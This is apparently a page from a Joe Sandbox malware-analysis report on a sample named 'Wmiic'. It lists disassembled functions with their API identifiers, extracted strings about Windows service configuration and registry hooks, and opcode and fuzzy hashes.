                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Heap_snwprintf_s$Process$AllocFreeObjectServiceSingleStatusWait
                                                                                                                                                                                                    • String ID: %lu$%s()
                                                                                                                                                                                                    • API String ID: 3601813699-699940799
                                                                                                                                                                                                    • Opcode ID: 0ffba0166ba33d02090c299909e839c505018103f0bb2f8e7f4f694d868e91e3
                                                                                                                                                                                                    • Instruction ID: 69971400c90e31b65b72574bdd09145e1363e6fa122ccb17f487d7069af77f90
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ffba0166ba33d02090c299909e839c505018103f0bb2f8e7f4f694d868e91e3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17514B76204B8186E6618B62A4503DA73A5F7887E4F50031AEFBD477E9DF39C509C700
                                                                                                                                                                                                    Function 000000014000FD70 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 112memoryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Heap$AllocConfig2ErrorLastProcessQueryService
                                                                                                                                                                                                    • String ID: SERVICE_CONFIG_DESCRIPTION$get_service_description()
                                                                                                                                                                                                    • API String ID: 2527037045-119971955
                                                                                                                                                                                                    • Opcode ID: 87cfc007ee1f7d47041ce5e3710580b357c85b779c488430ea12dfe6e7cffaa3
                                                                                                                                                                                                    • Instruction ID: ce23d3445b3d502cfd1cee6f423eb33bdad80a8a01337122df70ec9d9f023edb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 87cfc007ee1f7d47041ce5e3710580b357c85b779c488430ea12dfe6e7cffaa3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 08418E75600B8182EA22EBA3F8007EA67A1BB8DBD4F444129BF4947BB6DF3CC545D700
                                                                                                                                                                                                    Function 0000000140011DB0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 155COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$ConsoleHandleProcessStation
                                                                                                                                                                                                    • String ID: %s: %lu: %s$%s: %s
                                                                                                                                                                                                    • API String ID: 2390998093-150483647
                                                                                                                                                                                                    • Opcode ID: dd4fb859678dd9658312077e5fb5972b1ddeae43dbb5eb2bda94efda359b6f6e
                                                                                                                                                                                                    • Instruction ID: 935a7045af60d552a4a1b6eb069eef078a932ada1a95a9807a014f2b4c9f0a51
                                                                                                                                                                                                    • Opcode Fuzzy Hash: dd4fb859678dd9658312077e5fb5972b1ddeae43dbb5eb2bda94efda359b6f6e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF618F31204B8582EA26EB52F4443DA73A4FB8DBC4F404225FB990BBA6EF39C556C700
                                                                                                                                                                                                    Function 0000000140009400 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 126memorypipethreadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Heap$CreateErrorLastProcess$AllocFreeHandleInformationPipeThread
                                                                                                                                                                                                    • String ID: create_logging_thread()$logger
                                                                                                                                                                                                    • API String ID: 3682172063-2332508298
                                                                                                                                                                                                    • Opcode ID: 6ce080337fbdde164dd771dbbd35574d1c3cc7e9e503ab1a96137a68f46eed7a
                                                                                                                                                                                                    • Instruction ID: 0f708c83b6d6882e8b311f25b1277f2bd71e346d58eaf93934f5f47650e512b5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ce080337fbdde164dd771dbbd35574d1c3cc7e9e503ab1a96137a68f46eed7a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E514B76205B9086E7A1CB63B95079A77A0F78CBC0F44402AEF8983B69DF38D565CB00
                                                                                                                                                                                                    Function 0000000140016540 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 116COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: %c%s$dump$setting_dump_dependon
                                                                                                                                                                                                    • API String ID: 0-3641056368
                                                                                                                                                                                                    • Opcode ID: 57a2d30268ecd36bb96e0013271ec2899ae4f714c99f68fd30a59840ab665ad2
                                                                                                                                                                                                    • Instruction ID: 5b2c56ca74a4f11c5f493cda54f30b86cc1eab8f828d8a41247e1b07d06811aa
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 57a2d30268ecd36bb96e0013271ec2899ae4f714c99f68fd30a59840ab665ad2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB415E72605B8086E7529F62B8003DA77A4F789BE4F454216FF99477A8DF39C986C700
                                                                                                                                                                                                    Function 000000014000B050 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 89memoryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Heap$Process$AllocErrorFileFreeLastModuleName_snwprintf_s
                                                                                                                                                                                                    • String ID: % 8lu %s%s$???$[WOW64]
                                                                                                                                                                                                    • API String ID: 2935443209-3245662266
                                                                                                                                                                                                    • Opcode ID: cbb4cfd1420a93e7b420b7677ccf895b67e377104a8596a3b37561e861a92888
                                                                                                                                                                                                    • Instruction ID: e0c9e3d2c961057911ea44f832aeb7ed931542fe1b8e416e59bf97ed6bf11b92
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cbb4cfd1420a93e7b420b7677ccf895b67e377104a8596a3b37561e861a92888
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 05319A71301A8592EB16DB62E8507DA63A0FB8CBC4F444126FB5D877A8EF3CC946C700
                                                                                                                                                                                                    Function 000000014000F170 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 63memoryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Heap$ConfigErrorLastProcessQueryService$AllocFree
                                                                                                                                                                                                    • String ID: QUERY_SERVICE_CONFIG$query_service_config()
                                                                                                                                                                                                    • API String ID: 2921672788-976127789
                                                                                                                                                                                                    • Opcode ID: 6385d850b7c4583b6f4ff08a7ab95c0a91cc1a175e4f964d4c8b666ba4b27812
                                                                                                                                                                                                    • Instruction ID: 12ef63c7e0ec9709d506b3c2b775e2798cffe3e90e480b8a1bef477be83b5080
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6385d850b7c4583b6f4ff08a7ab95c0a91cc1a175e4f964d4c8b666ba4b27812
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E0215E75604A9082EB02DBA7F8043DAA7A0BB8DBC4F444429FF4E43B79DE7CC9459B00
                                                                                                                                                                                                    Function 000000014000C570 Relevance: 16.7, APIs: 8, Strings: 3, Instructions: 183memoryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Heap$Process$AllocFree
                                                                                                                                                                                                    • String ID: append_to_double_null()$key$newdn
                                                                                                                                                                                                    • API String ID: 756756679-3598718664
                                                                                                                                                                                                    • Opcode ID: e8c0b0ba8166b1c5237778d83a4dddeaf43343473c6732b3d22e86108212e6b8
                                                                                                                                                                                                    • Instruction ID: a8659a9f761dcd48a20ea0bbf3106ddecff7fc8e2851ddb4a1a6f8d7a32dd65c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e8c0b0ba8166b1c5237778d83a4dddeaf43343473c6732b3d22e86108212e6b8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF7180B6615A8081E662DB26B41079AB7A0FB4DBE4F448215FF6953BE8EB3CC545C700
                                                                                                                                                                                                    Function 000000014000C840 Relevance: 16.7, APIs: 8, Strings: 3, Instructions: 164memoryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Heap$Process$AllocFree
                                                                                                                                                                                                    • String ID: key$newdn$remove_from_double_null()
                                                                                                                                                                                                    • API String ID: 756756679-180665911
                                                                                                                                                                                                    • Opcode ID: dec6ef9297f2f528877f7eddd1e9d4dee81437ed94269273f5d5e12274e4d5bc
                                                                                                                                                                                                    • Instruction ID: 8c6053ef598a717a1cf223f2861525f2768c9fab3b540323a4fd1412df3eeb5f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: dec6ef9297f2f528877f7eddd1e9d4dee81437ed94269273f5d5e12274e4d5bc
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03619D76722A9485E622DF26B8047D9B7E0F749BD4F488219EF59037E8DF38C985C300
                                                                                                                                                                                                    Function 000000014000E8B0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 129COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: %c%u
                                                                                                                                                                                                    • API String ID: 0-883269693
                                                                                                                                                                                                    • Opcode ID: d2118b9a9eada75ffb7c5c227ec89a3223c0b64f80d6bc3e61d26a13f3fa7dcd
                                                                                                                                                                                                    • Instruction ID: e75947337f5fd74baf7b6f5cfe7824060c4155299e81c8694041bf6305fe6a32
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d2118b9a9eada75ffb7c5c227ec89a3223c0b64f80d6bc3e61d26a13f3fa7dcd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C51D072215AC596E7A1CF26F4483DA73A0F78C7E8F548229EB5957BE8DB38C105CB00
                                                                                                                                                                                                    Function 000000014000D020 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 105registryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Event$Source$CloseDeregisterQueryRegisterReportValue_snwprintf_s
                                                                                                                                                                                                    • String ID: %s\%s$AppEvents$hook registry$set_hook()
                                                                                                                                                                                                    • API String ID: 2341694245-1670097391
                                                                                                                                                                                                    • Opcode ID: b442a7b8d74010f362647dca0de7b108b6b00fa7208d0fa25c58233f39fd3f26
                                                                                                                                                                                                    • Instruction ID: 6d0862f9470687456da518464cbe15381b9a51efbdc411d03d7a1f67d58250b0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b442a7b8d74010f362647dca0de7b108b6b00fa7208d0fa25c58233f39fd3f26
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9041B17131468059EB62CB23B891BEA6291B74DBE4F84032ABF6E47BE5DF3CC5459310
                                                                                                                                                                                                    Function 0000000140002430 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 62windowmemoryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FormatMessageValue$AllocDefaultLangLocalUser_snwprintf_s
                                                                                                                                                                                                    • String ID: <out of memory for error message>$system error %lu
                                                                                                                                                                                                    • API String ID: 2253289489-3923297632
                                                                                                                                                                                                    • Opcode ID: c57cf59de28d07db67d5877a0ca59d18a7d4958fae7d58dbe770bbd656636a06
                                                                                                                                                                                                    • Instruction ID: a577034a7231977c6e80a66ab4d1eee538ee20579c78fea223c5835cb28133ac
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c57cf59de28d07db67d5877a0ca59d18a7d4958fae7d58dbe770bbd656636a06
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7E21327160478186E7229F26F8547A66291FB8C7E8F444238EB99477E4EF3CC8548704
                                                                                                                                                                                                    Function 000000014001C1A0 Relevance: 13.8, APIs: 11, Instructions: 90COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$ErrorFreeHeapLast_errno
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1012874770-0
                                                                                                                                                                                                    • Opcode ID: a77eea8c151e190d82b6f428cf3663883c0e4f19f30549a310c13090e96925bf
                                                                                                                                                                                                    • Instruction ID: ba48b5ff12f0f3a38f4112c7b4e794e919eaded4b65ab0df7ef7b43739d5b6dd
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a77eea8c151e190d82b6f428cf3663883c0e4f19f30549a310c13090e96925bf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D941083261268486FF579FA3C4557EC23A0AB9EBC4F480535EB1D1F6A5CF7AC8918320
                                                                                                                                                                                                    Function 0000000140022118 Relevance: 13.7, APIs: 9, Instructions: 173COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetStringTypeW.KERNEL32(?,?,?,?,?,?,00000008,00000001400223EA), ref: 0000000140022178
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,00000008,00000001400223EA), ref: 000000014002218A
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,00000008,00000001400223EA), ref: 00000001400221EA
                                                                                                                                                                                                    • malloc.LIBCMT ref: 0000000140022256
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,00000008,00000001400223EA), ref: 00000001400222A0
                                                                                                                                                                                                    • GetStringTypeW.KERNEL32(?,?,?,?,?,?,00000008,00000001400223EA), ref: 00000001400222B7
                                                                                                                                                                                                    • free.LIBCMT ref: 00000001400222C8
                                                                                                                                                                                                    • GetStringTypeA.KERNEL32(?,?,?,?,?,?,00000008,00000001400223EA), ref: 0000000140022345
                                                                                                                                                                                                    • free.LIBCMT ref: 0000000140022355
                                                                                                                                                                                                      • Part of subcall function 000000014002463C: GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 0000000140024692
                                                                                                                                                                                                      • Part of subcall function 000000014002463C: GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00000001400246B1
                                                                                                                                                                                                      • Part of subcall function 000000014002463C: MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00000001400247B5
                                                                                                                                                                                                      • Part of subcall function 000000014002463C: WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00000001400247F0
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharMultiWide$StringType$Infofree$ErrorLastmalloc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3804003340-0
                                                                                                                                                                                                    • Opcode ID: e91ada0d3418bd2f4ec09be758e20b385c78253fc2d9f4ca109f82a3e7e5caae
                                                                                                                                                                                                    • Instruction ID: d53383f59eec4462090a64fdbba06e0d248b67d1e792285d37ae28196ec31423
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e91ada0d3418bd2f4ec09be758e20b385c78253fc2d9f4ca109f82a3e7e5caae
